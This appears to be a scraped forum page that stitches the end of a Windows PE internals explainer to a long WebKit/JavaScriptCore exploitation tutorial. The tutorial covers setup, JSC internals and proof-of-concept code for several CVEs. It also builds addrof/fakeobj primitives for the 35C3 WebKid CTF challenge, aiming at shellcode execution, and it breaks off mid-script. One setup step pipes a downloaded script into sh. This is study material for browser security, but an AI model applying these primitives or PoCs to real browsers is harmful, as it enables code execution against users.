If two executables attempt to be loaded into the same virtual space, one must be relocated to another virtual space. Each executable module is assigned a base address, and if something is already there, it must be relocated. There are never absolute memory addresses in executable headers; those only exist in the code. To make this work, whenever there is a pointer inside the executable header, it is always a relative virtual address (RVA). Think of this as simply an offset. When the file is loaded, it is assigned a virtual address and the loader calculates real virtual addresses out of RVAs by adding the module's base address to the RVA.

Image Sections
An executable image is divided into individual sections in which the file's contents are stored. Sections are needed because different areas in the file are treated differently by the memory manager when a module is loaded. The most basic division is between a code section (also called text), containing the executable's code, and a data section, containing the executable's data. When loaded, the memory manager sets the access rights on memory pages in the different sections based on their settings in the section header.

Section Alignment
Individual sections often have different access settings defined in the executable header.
The memory manager must apply these access settings when an executable image is loaded. Sections must typically be page aligned when an executable is loaded into memory. It would take extra space on disk to page align sections on disk. Therefore, the PE header has two different kinds of alignment fields: section alignment and file alignment.

DLLs
DLLs allow a program to be broken into more than one executable file. In this way, overall memory consumption is reduced because executables are not loaded until the features they implement are required. Individual components can be replaced or upgraded to modify or improve a certain aspect of the program. DLLs can dramatically reduce overall system memory consumption because the system can detect that a certain executable has been loaded into more than one address space and map it into each address space instead of reloading it into a new memory location. DLLs are different from static libraries (.lib), which are linked into the executable at build time.

Loading DLLs
Static linking is implemented by having each module list the modules it uses and the functions it calls within each module. This is known as an import table (see IDA Pro tutorial). Runtime linking refers to a different process whereby an executable can decide to load another executable at runtime and call a function from that executable.

PE Headers
A Portable Executable (PE) file starts with a DOS header and the familiar "This program cannot be run in DOS mode" stub.

typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

This data structure references two data structures which contain the actual PE header.

Imports and Exports
Imports and exports are the mechanisms that enable the dynamic linking process of executables. The compiler has no idea of the actual addresses of the imported functions; only at runtime will these addresses be known. To solve this issue, the linker creates an import table that lists all the functions imported by the current module by their names. Sursa: https://www.hackers-arise.com/single-post/2017/07/04/Reverse-Engineering-Malware-Part-4-Windows-Internals
    1 point
  14. Webkit Exploitation Tutorial 41 minute read Contents Preface Setup Virtual Machine Source Code Debugger and Editor Test Compiling JavaScriptCore Triggering Bugs Understanding WebKit Vulnerability 1. Use After Free 2. Out of Bound 3. Type Confusion 4. Integer Overflow 5. Else JavaScriptCore in Depth JSC Value Representation JSC Object Model 0x0 Fast JSObject 0x1 JSObject with dynamically added fields 0x2 JSArray with room for 3 array elements 0x3 Object with fast properties and array elements 0x4 Object with fast and dynamic properties and array elements 0x5 Exotic object with dynamic properties and array elements Type Inference Watchpoints Compilers 0x0. LLInt 0x1. Baseline JIT and Byte Code Template 0x2. DFG 0x3. FLT 0x4. More About Optimization Garbage Collector (TODO) Writing Exploitation Analyzing Utility Functions Getting Native Code Controlling Bytes Writing Exploit Detail about the Script Conclusion on the Exploitation Debugging WebKit Setting Breakpoints Inspecting JSC Objects Getting Native Code 1 Day Exploitation Root Cause Quotation from Lokihardt Line by Line Explanation Debugging Constructing Attack Primitive addrof fakeobj Arbitrary R/W and Shellcode Execution Acknowledgement References Preface OKay, binary security is not only heap and stack, we still have a lot to discover despite regular CTF challenge. Browser, Virtual Machine, and Kernel all play an important role in binary security. And I decide to study browser first. I choose a relatively easy one: WebKit. (ChakraCore might be easier, LoL. But there’s a rumor about Microsoft canceling the project. Thus I decided not to choose it). I will write a series of posts to record my notes in studying WebKit security. It’s also my first time learning Browser Security, my posts probably will have lots of mistakes. If you notice them, don’t be hesitate to contact me for corrections. Before reading it, you need to know: C++ grammar Assembly Language grammar Installation of Virtual Machine Familiar to Ubuntu and its command line Basic compile theory concepts Setup Okay, let’s start now. Virtual Machine First, we need to install a VM as our testing target. Here, I choose Ubuntu 18.04 LTS and Ubuntu 16.04 LTSas our target host. You can download here. If I don’t specify the version, please use 18.04 LTS as default version. Mac might be a more appropriate choice since it has XCode and Safari. Consider to MacOS’s high resource consumption and unstable update, I would rather use Ubuntu. We need a VM software. I prefer to use VMWare. Parallel Desktop and VirtualBox(Free) are also fine, it depends on your personal habit. I won’t tell you how to install Ubuntu on VMWare step by step. However, I still need to remind you to allocate as much memory and CPUs as possible because compilation consumes a huge amount of resource. An 80GB disk should be enough to store source code and compiled files. Source Code You can download WebKit source code in three ways: git, svn, and archive. The default version manager of WebKit is svn. But I choose git(too unfamiliar to use svn): git clone git://git.webkit.org/WebKit.git WebKit Debugger and Editor IDE consumes lots of resource, so I use vim to edit source code. Most debug works I have seen use lldb which I am not familiar to. Therefore, I also install gdb with gef plugin. sudo apt install vim gdb lldb wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh Test Compiling JavaScriptCore Compiling a full WebKit takes a large amount of time. 
We only compile JSC(JavaScript Core) currently, where most vulnerabilities come from. Now, you should in the root directory of WebKit source code. Run this to prepare dependencies: Tools/gtk/install-dependencies Even though we still not compile full WebKit now, you can install remaining dependencies first for future testing. This step is not required in compiling JSC if you don’t want to spend too much time: Tools/Scripts/update-webkitgtk-libs After that, we can compile JSC: Tools/Scripts/build-webkit --jsc-only A couple of minutes later, we can run JSC by: WebKitBuild/Release/bin/jsc Let’s do some tests: >>> 1+1 2 >>> var obj = {a:1, b:"test"} undefined >>> JSON.stringify(obj) {"a":1,"b":"test"} Triggering Bugs Ubuntu 18.04 LTS here We use CVE-2018-4416 to test, here is the PoC. Store it to poc.js at the same folder of jsc: function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. return obj[k]; // Type confusion. } } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x1234; let fake_object = opt(fake_object_memory); print(fake_object); First, switch to the vulnerable version: git checkout -b CVE-2018-4416 034abace7ab It may spend even more time than compiling Run: ./jsc poc.js, and we can get: ASSERTION FAILED: structureID < m_capacity ../../Source/JavaScriptCore/runtime/StructureIDTable.h(129) : JSC::Structure* JSC::StructureIDTable::get(JSC::StructureID) 1 0x7f055ef18c3c WTFReportBacktrace 2 0x7f055ef18eb4 WTFCrash 3 0x7f055ef18ec4 WTFIsDebuggerAttached 4 0x5624a900451c JSC::StructureIDTable::get(unsigned int) 5 0x7f055e86f146 bool JSC::JSObject::getPropertySlot<true>(JSC::ExecState*, JSC::PropertyName, JSC::PropertySlot&) 6 0x7f055e85cf64 7 0x7f055e846693 JSC::JSObject::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const 8 0x7f055e7476bb JSC::JSCell::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const 9 0x7f055e745ac8 JSC::JSValue::toStringSlowCase(JSC::ExecState*, bool) const 10 0x5624a900b3f1 JSC::JSValue::toString(JSC::ExecState*) const 11 0x5624a8fcc3a9 12 0x5624a8fcc70c 13 0x7f05131fe177 Illegal instruction (core dumped) If we run this on latest version(git checkout master to switch back, and delete build content rm -rf WebKitBuild/Relase/* and rm -rf WebKitBuild/Debug/*😞 ./jsc poc.js WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory will be disabled. 
OK undefined ================================================================= ==96575==ERROR: LeakSanitizer: detected memory leaks Direct leak of 96 byte(s) in 3 object(s) allocated from: #0 0x7fe1f579e458 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0458) #1 0x7fe1f2db7cc8 in __gnu_cxx::new_allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> >::allocate(unsigned long, void const*) (/home/browserbox/WebKit/WebKitBuild/Debug/lib/libJavaScriptCore.so.1+0x5876cc8) #2 0x7fe1f2db7a7a in std::allocator_traits<std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, ... // lots of error message SUMMARY: AddressSanitizer: 216 byte(s) leaked in 6 allocation(s). Now, we succeed triggering a bug! I am not gonna to explain the detail(I don’t know either). Hope we can figure out the root cause after a few weeks Understanding WebKit Vulnerability Now, it’s time to discuss something deeper. Before we start to talk about WebKit architecture, let’s find out common bugs in WebKit. Here, I only discuss binary level related bugs. Some higher level bugs, like URL Spoof or UXSS, are not our topic. Examples below are not merely from WebKit. Some are Chrome’s bugs. We will introduce briefly. And analyze PoC specifically later. Before reading this part, you are strongly recommended to read some materials about compiler theory. Basic Pwn knowledge should also be learned. My explanation is not clear. Again, correct my mistakes if you find. This post will be updated several times as my understanding in JSC becomes deeper. Don’t forget to check it later. 1. Use After Free A.k.a UAF. This is common in CTF challenge, a classical scenario: char* a = malloc(0x100); free(a); printf("%s", a); Because of some logic errors. The code will reuse freed memory. Usually, we can leak or write once we controlled the freed memory. CVE-2017-13791 is an example for WebKit UAF. Here is the PoC: <script> function jsfuzzer() { textarea1.setRangeText("foo"); textarea2.autofocus = true; textarea1.name = "foo"; form.insertBefore(textarea2, form.firstChild); form.submit(); } function eventhandler2() { for(var i=0;i<100;i++) { var e = document.createElement("input"); form.appendChild(e); } } </script> <body onload=jsfuzzer()> <form id="form" onchange="eventhandler2()"> <textarea id="textarea1">a</textarea> <object id="object"></object> <textarea id="textarea2">b</textarea> 2. Out of Bound A.k.a OOB. It’s like the overflow in Browser. Still, we can read/write nearby memory. OOB frequently occurs in false optimization of an array or insufficient check. For example(CVE-2017-2447😞 var ba; function s(){ ba = this; } function dummy(){ alert("just a function"); } Object.defineProperty(Array.prototype, "0", {set : s }); var f = dummy.bind({}, 1, 2, 3, 4); ba.length = 100000; f(1, 2, 3); When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. 
Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered) and reads out of bounds. In most cases an OOB alone does not let us directly overwrite the $RIP register; exploit writers typically craft a fake array to turn a partial R/W into arbitrary R/W. 3. Type Confusion This is a vulnerability class typical of applications that contain a compiler or interpreter, and it is slightly harder to explain. Imagine we have the following object (32 bits): struct example{ int length; char *content; } If we have an instance with length == 5 and a content pointer, the memory looks roughly like this: 0x00: 0x00000005 -> length 0x04: 0xdeadbeef -> pointer Now suppose we have another object: struct exploit{ int length; void (*exp)(); } If we can force the engine to parse an example object as an exploit object, we can point the exp function pointer at an arbitrary address and achieve RCE. An example of type confusion: var q; function g(){ q = g.caller; return 7; } var a = [1, 2, 3]; a.length = 4; Object.defineProperty(Array.prototype, "3", {get : g}); [4, 5, 6].concat(a); q(0x77777777, 0x77777777, 0); Cited from CVE-2017-2446: If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. 4. Integer Overflow Integer overflow is also common in CTF. Although an integer overflow by itself does not give RCE, it often leads to an OOB. The bug is not difficult to understand. Imagine you are running the code below on a 32-bit machine: mov eax, 0xffffffff add eax, 2 Because the maximum value of eax is 0xffffffff, it cannot hold 0xffffffff + 2 = 0x100000001. The bits above the 32nd are discarded, so the final value of eax is 0x00000001. This is an example from WebKit (CVE-2017-2536): var a = new Array(0x7fffffff); var x = [13, 37, ...a, ...a]; The combined length is not checked correctly and can overflow, so the array's reported length no longer matches its backing storage, and we can then use that oversized array for OOB access (a small C sketch of this overflow-to-OOB pattern appears a few paragraphs below). 5. Else Some bugs are difficult to categorize, for example: Race Condition, Unallocated Memory, … I will explain them in detail later. JavaScriptCore in Depth WebKit primarily consists of: JavaScriptCore: the JavaScript execution engine. WTF: the Web Template Framework, a replacement for the C++ STL, with its own string operations, smart pointers, and so on; the heap implementation is also unique here. DumpRenderTree: produces the render tree. WebCore: the most complicated part, containing CSS, DOM, HTML, rendering, and almost everything in the browser apart from the components above. And JSC itself has: a lexer, a parser, a start-up interpreter (LLInt), three JavaScript JIT compilers whose compile times get progressively longer while the generated code runs faster and faster: the baseline JIT (the initial JIT), a low-latency optimizing JIT (DFG), and a high-throughput optimizing JIT (FTL, the final tier), plus two WebAssembly execution engines: BBQ and OMG. Still, a disclaimer: this post might be inaccurate or wrong in explaining WebKit mechanisms. If you have taken a basic compiler theory course, the lexer and parser are just what you learned in class. But the code generation part is frustrating: it has one interpreter and three compilers, WTF? 
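Before digging into those internals, here is the small C sketch of the overflow-to-OOB pattern promised earlier in the Integer Overflow subsection. It is only a hedged illustration: the tiny_array structure and the append function are invented for this post, not WebKit code.

#include <stdint.h>
#include <string.h>

/* Hypothetical container: an element count plus a small backing store. */
typedef struct {
    uint32_t length;
    uint32_t data[8];
} tiny_array;

/* The bounds check adds two attacker-influenced 32-bit values. If `count`
 * is close to UINT32_MAX, `a->length + count` wraps around, the check
 * passes, and memcpy() then writes far beyond data[]. */
int tiny_array_append(tiny_array *a, const uint32_t *src, uint32_t count) {
    if (a->length + count > 8)   /* e.g. 4 + 0xfffffffd wraps to 1, so the check passes */
        return -1;
    memcpy(&a->data[a->length], src, (size_t)count * sizeof(uint32_t)); /* OOB write */
    a->length += count;
    return 0;
}

int main(void) {
    tiny_array a = { .length = 4 };
    uint32_t src[4] = { 0x41414141, 0x41414141, 0x41414141, 0x41414141 };
    /* The wrapped check is bypassed and the huge memcpy corrupts memory and
     * crashes the process, which is exactly what an attacker builds on. */
    return tiny_array_append(&a, src, 0xfffffffdu);
}

Real bugs such as CVE-2017-2536 follow the same shape, only with JavaScript array lengths and butterflies instead of a toy struct.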
JSC also has many other unconventional features, let’s have a look: JSC Value Representation To easier identifying, JSC’s value represents differently: pointer : 0000:PPPP:PPPP:PPPP (begins with 0000, then its address) double (begins with 0001 or FFFE): 0001:****:****:**** FFFE:****:****:**** integer: FFFF:0000:IIII:IIII (use IIII:IIII for storing value) false: 0x06 true: 0x07 undefined: 0x0a null: 0x02 0x0, however, is not a valid value and can lead to a crash. JSC Object Model Unlike Java, which has fix class member, JavaScript allows people to add properties any time. So, despite traditionally statically align properties, JSC has a butterfly pointer for adding dynamic properties. It’s like an additional array. Let’s explain it in several situations. Also, JSArray will always be allocated to butterfly pointer since they change dynamically. We can understand the concept easily with the following graph: 0x0 Fast JSObject The properties are initialized: var o = {f: 5, g: 6}; The butterfly pointer will be null here since we only have static properties: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | NULL | --> Butterfly Pointer -------------- | 0xffff000 | --> 5 in JS format | 000000005 | -------------- | 0xffff000 | | 000000006 | --> 6 in JS format -------------- Let’s expand our knowledge of JSObject. As we see, each structure ID has a matched structure table. Inside the table, it contains the property names and their offsets. In our previous object o, the table looks like: property name location “f” inline(0) “g” inline(1) When we want to retrieve a value(e.g. var v = o.f), following behaviors will happen: if (o->structureID == 42) v = o->inlineStorage[0] else v = slowGet(o, “f”) You might wonder why the compiler will directly retrieve the value via offset when knowing the ID is 42. This is a mechanism called inline caching, which helps us to get value faster. We won’t talk about this much, click here for more details. 0x1 JSObject with dynamically added fields var o = {f: 5, g: 6}; o.h = 7; Now, the butterfly has a slot, which is 7. -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000007 | | 000000005 | | ------------- -------------- -> | ... | | 0xffff000 | | 000000006 | -------------- 0x2 JSArray with room for 3 array elements var a = []; The butterfly initializes an array with estimated size. The first element 0 means a number of used slots. 
And 3 means the max slots: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0 | | ------------- (8 bits for these two elements) | | 3 | -> ------------- | <hole> | ------------- | <hole> | ------------- | <hole> | ------------- 0x3 Object with fast properties and array elements var o = {f: 5, g: 6}; o[0] = 7; We filled an element of the array, so 0(used slots) increases to 1 now: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000005 | | | 3 | -------------- -> ------------- | 0xffff000 | | 0xffff000 | | 000000006 | | 000000007 | -------------- ------------- | <hole> | ------------- | <hole> | ------------- 0x4 Object with fast and dynamic properties and array elements var o = {f: 5, g: 6}; o[0] = 7; o.h = 8; The new member will be appended before the pointer address. Arrays are placed on the right and attributes are on the left of butterfly pointer, just like the wing of a butterfly: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000008 | | 000000005 | | ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000006 | | | 2 | -------------- -> ------------- (pointer address) | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- 0x5 Exotic object with dynamic properties and array elements var o = new Date(); o[0] = 7; o.h = 8; We extend the butterfly with a built-in class, the static properties will not change: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | < C++ | | | 000000008 | | State > | -> ------------- -------------- | 1 | | < C++ | ------------- | State > | | 2 | -------------- ------------- | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- Type Inference JavaScript is a weak, dynamic type language. The compiler will do a lot of works in type inference, causing it becomes extremely complicated. Watchpoints Watchpoints can happen in the following cases: haveABadTime Structure transition InferredValue InferredType and many others… When above situations happen, it will check whether watchpoint has optimized. In WebKit, it represents like this: class Watchpoint { public: virtual void fire() = 0; }; For example, the compiler wants to optimize 42.toString() to "42" (return directly rather than use code to convert), it will check if it’s already invalidated. Then, If valid, register watchpoint and do the optimization. Compilers 0x0. LLInt At the very beginning, the interpreter will generate byte code template. Use JVM as an example, to executes .class file, which is another kind of byte code template. Byte code helps to execute easier: parser -> bytecompiler -> generatorfication -> bytecode linker -> LLInt 0x1. Baseline JIT and Byte Code Template Most basic JIT, it will generate byte code template here. 
For example, this is add in JavaScript: function foo(a, b) { return a + b; } And this is the bytecode IL, which is more straightforward (no sophisticated lexical structure is left) and more convenient to lower to assembly: [ 0] enter [ 1] get_scope loc3 [ 3] mov loc4, loc3 [ 6] check_traps [ 7] add loc6, arg1, arg2 [12] ret loc6 Bytecode offsets 7 and 12 produce the following DFG IL (discussed next). Notice how much type-related information it carries while operating: the nodes record the expected types of arg1 and arg2 and whether the add can overflow: GetLocal(Untyped:@1, arg1(B<Int32>/FlushedInt32), R:Stack(6), bc#7); GetLocal(Untyped:@2, arg2(C<BoolInt32>/FlushedInt32), R:Stack(7), bc#7); ArithAdd(Int32:@23, Int32:@24, CheckOverflow, Exits, bc#7); MovHint(Untyped:@25, loc6, W:SideState, ClobbersExit, bc#7, ExitInvalid); Return(Untyped:@25, W:SideState, Exits, bc#12); The AST looks like this: +----------+ | return | +----+-----+ | | +----+-----+ | add | +----------+ | | | | v v +--+---+ +-+----+ | arg1 | | arg2 | +------+ +------+ 0x2. DFG If JSC notices that a function is running frequently, it moves to the next tier. The previous phase has already generated bytecode, so the DFG parser consumes the bytecode directly, which is less abstract and easier to parse. Then the DFG optimizes it and generates code: DFG bytecode parser -> DFG optimizer -> DFG Backend At this tier the code has run many times and the observed types are relatively stable, so type checks rely on OSR (on-stack replacement). Imagine we optimize from this: int foo(int* ptr) { int w, x, y, z; w = ... // lots of stuff x = is_ok(ptr) ? *ptr : slow_path(ptr); y = ... // lots of stuff z = is_ok(ptr) ? *ptr : slow_path(ptr); return w + x + y + z; } to this: int foo(int* ptr) { int w, x, y, z; w = ... // lots of stuff if (!is_ok(ptr)) return foo_base1(ptr, w); x = *ptr; y = ... // lots of stuff z = *ptr; return w + x + y + z; } The code runs faster because the check on ptr is done only once. If the type of ptr keeps changing, however, the optimized code runs slower because of frequent bail-outs. That is why the browser only applies this speculative optimization once the code has run thousands of times. 0x3. FTL If a function keeps running hot, hundreds or thousands of times more, the JIT promotes it to the FTL. Like the DFG, the FTL reuses the bytecode, but applies much deeper optimization: DFG bytecode parser -> DFG optimizer -> DFG-to-B3 lowering -> B3 Optimizer -> Instruction Selection -> Air Optimizer -> Air Backend 0x4. More About Optimization Let's look at how the IR changes across the optimization phases: Bytecode is a high-level, load/store style IR (e.g. bitor dst, left, right); DFG is a medium-level, exotic SSA IR (e.g. dst: BitOr(Int32:@left, Int32:@right, ...)); B3 is a low-level, normal SSA IR (e.g. Int32 @dst = BitOr(@left, @right)); Air is an architectural, CISC-style IR (e.g. Or32 %src, %dest). Type checks are gradually eliminated along the way (a good hint as to why there are so many type-confusion CVEs in browsers), and the IRs become closer and closer to machine code. When a type check fails at runtime, the JIT-compiled code bails out to a lower tier and execution continues there. Garbage Collector (TODO) The JSC heap is garbage collected: the GC scans the heap to find objects that are no longer referenced and reclaims their memory. …still need more material… Writing Exploitation Before we start exploiting bugs in the wild, we should get a feel for how difficult it is to write an exploit. We focus on the exploit code itself here; the details of the vulnerability are only touched on briefly. The challenge is WebKid from the 35C3 CTF. 
You can compile WebKit binary(with instructions), prepared VM, and get exploit code here. Also, a macOS Mojave (10.14.2) should be prepared in VM or real machine (I think it won’t affect crashes in different versions of macOS, but the attack primitive might be different). Run via this command: DYLD_LIBRARY_PATH=/Path/to/WebKid DYLD_FRAMEWORK_PATH=/Path/to/WebKid /Path/to/WebKid/MiniBrowser.app/Contents/MacOS/MiniBrowser Remember to use FULL PATH. Otherwise, the browser will crash If running on a local machine, remember to create /flag1 for testing. Analyzing Let’s look at the patch: diff --git a/Source/JavaScriptCore/runtime/JSObject.cpp b/Source/JavaScriptCore/runtime/JSObject.cpp index 20fcd4032ce..a75e4ef47ba 100644 --- a/Source/JavaScriptCore/runtime/JSObject.cpp +++ b/Source/JavaScriptCore/runtime/JSObject.cpp @@ -1920,6 +1920,31 @@ bool JSObject::hasPropertyGeneric(ExecState* exec, unsigned propertyName, Proper return const_cast<JSObject*>(this)->getPropertySlot(exec, propertyName, slot); } +static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) +{ + ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); + + Structure* previous = structure->previousID(); + if (!previous) + return false; + + unsigned unused; + bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); + if (!isLastAddedProperty) + return false; + + RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); + + if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { + ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); + thisObject->setButterfly(vm, nullptr); + } + + thisObject->setStructure(vm, previous); + + return true; +} + // ECMA 8.6.2.5 bool JSObject::deleteProperty(JSCell* cell, ExecState* exec, PropertyName propertyName) { @@ -1946,18 +1971,21 @@ bool JSObject::deleteProperty(JSCell* cell, ExecState* exec, PropertyName proper Structure* structure = thisObject->structure(vm); - bool propertyIsPresent = isValidOffset(structure->get(vm, propertyName, attributes)); + PropertyOffset offset = structure->get(vm, propertyName, attributes); + bool propertyIsPresent = isValidOffset(offset); if (propertyIsPresent) { if (attributes & PropertyAttribute::DontDelete && vm.deletePropertyMode() != VM::DeletePropertyMode::IgnoreConfigurable) return false; - PropertyOffset offset; - if (structure->isUncacheableDictionary()) + if (structure->isUncacheableDictionary()) { offset = structure->removePropertyWithoutTransition(vm, propertyName, [] (const ConcurrentJSLocker&, PropertyOffset) { }); - else - thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } else { + if (!tryDeletePropertyQuickly(vm, thisObject, structure, propertyName, attributes, offset)) { + thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } + } - if (offset != invalidOffset) + if (offset != invalidOffset && (!isOutOfLineOffset(offset) || thisObject->butterfly())) thisObject->locationForOffset(offset)->clear(); } diff --git a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in index 536481ecd6a..62189fea227 100644 --- a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in +++ 
b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in @@ -25,6 +25,12 @@ (deny default (with partial-symbolication)) (allow system-audit file-read-metadata) +(allow file-read* (literal "/flag1")) + +(allow mach-lookup (global-name "net.saelo.shelld")) +(allow mach-lookup (global-name "net.saelo.capsd")) +(allow mach-lookup (global-name "net.saelo.capsd.xpc")) + #if PLATFORM(MAC) && __MAC_OS_X_VERSION_MIN_REQUIRED < 101300 (import "system.sb") #else The biggest problem here is about tryDeletePropertyQuickly function, which acted like this (comment provided from Linus Henze: static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) { // This assert will always be true as long as we're not passing an "invalid" offset ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); // Try to get the previous structure of this object Structure* previous = structure->previousID(); if (!previous) return false; // If it has none, stop here unsigned unused; // Check if the property we're deleting is the last one we added // This must be the case if the old structure doesn't have this property bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); if (!isLastAddedProperty) return false; // Not the last property? Stop here and remove it using the normal way. // Assert that adding the property to the last structure would result in getting the current structure RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); // Uninteresting. Basically, this just deletes this objects Butterfly if it's not an array and we're asked to delete the last out-of-line property. The Butterfly then becomes useless because no property is stored in it, so we can delete it. if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); thisObject->setButterfly(vm, nullptr); } // Directly set the structure of this object thisObject->setStructure(vm, previous); return true; } In short, one object will fall back to previous structure ID by deleting an object added previously. For example: var o = [1.1, 2.2, 3.3, 4.4]; // o is now an object with structure ID 122. o.property = 42; // o is now an object with structure ID 123. The structure is a leaf (has never transitioned) function helper() { return o[0]; } jitCompile(helper); // Running helper function many times // In this case, the JIT compiler will choose to use a watchpoint instead of runtime checks // when compiling the helper function. As such, it watches structure 123 for transitions. delete o.property; // o now "went back" to structure ID 122. The watchpoint was not fired. Let’s review some knowledge first. In JSC, we have runtime type checks and watchpoint to ensure correct type conversion. After a function running many times, the JSC will not use structure check. Instead, it will replace it with watchpoint. When an object is modified, the browser should trigger watchpoint to notify this change to fallback to JS interpreter and generate new JIT code. Here, restoring to the previous ID does will not trigger watchpoint even though the structure has changed, which means the structure of butterfly pointer will also be changed. However, the JIT code generated by helper will not fallback since watchpoint is not trigged, leading to type confusion. 
And the JIT code can still access legacy butterfly structure. We can leak/create fake objects. This is the minimum attack primitive: haxxArray = [13.37, 73.31]; haxxArray.newProperty = 1337; function returnElem() { return haxxArray[0]; } function setElem(obj) { haxxArray[0] = obj; } for (var i = 0; i < 100000; i++) { returnElem(); setElem(13.37); } delete haxxArray.newProperty; haxxArray[0] = {}; function addrof(obj) { haxxArray[0] = obj; return returnElem(); } function fakeobj(address) { setElem(address); return haxxArray[0]; } // JIT code treat it as intereger, but it actually should be an object. // We can leak address from it print(addrof({})); // Almost the same as above, but it's for write data print(fakeobj(addrof({}))); Utility Functions The exploit script creates many utility functions. They help us to create primitive which you need in almost every webkit exploit. We will only look at some important functions. Getting Native Code To attack, we need a native code function to write shellcode or ROP. Besides, functions will only be a native code after running many times(this one is in pwn.js😞 function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } function makeJITCompiledFunction() { // Some code that can be overwritten by the shellcode. function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } Controlling Bytes In the int64.js, we craft a class Int64. It uses Uint8Array to store number and creates many related operations like add and sub. In the previous chapter, we mention that JavaScript uses tagged value to represent the number, which means that you cannot control the higher byte. The Uint8Array array represents 8-bit unsigned integers just like native value, allowing us to control all 8 bytes. Simple example usage of Uint8Array: var x = new Uint8Array([17, -45.3]); var y = new Uint8Array(x); console.log(x[0]); // 17 console.log(x[1]); // value will be converted 8 bit unsigned integers // 211 It can be merged to a 16 byte array. The following shows us that Uint8Array store in native form clearly, because 0x0201 == 513: a = new Uint8Array([1,2,3,4]) b = new Uint16Array(a.buffer) // Uint16Array [513, 1027] Remaining functions of Int64 are simulations of different operations. You can infer their implementations from their names and comments. Reading the codes is easy too. Writing Exploit Detail about the Script I add some comments from Saelo’s original writeup(most comments are still his work, great thanks!): const ITERATIONS = 100000; // A helper function returns function with native code function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } jitCompile(function dummy() { return 42; }); // Return a function with native code, we will palce shellcode in this function later function makeJITCompiledFunction() { // Some code that can be overwritten by the shellcode. function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } function setup_addrof() { var o = [1.1, 2.2, 3.3, 4.4]; o.addrof_property = 42; // JIT compiler will install a watchpoint to discard the // compiled code if the structure of |o| ever transitions // (a heuristic for |o| being modified). As 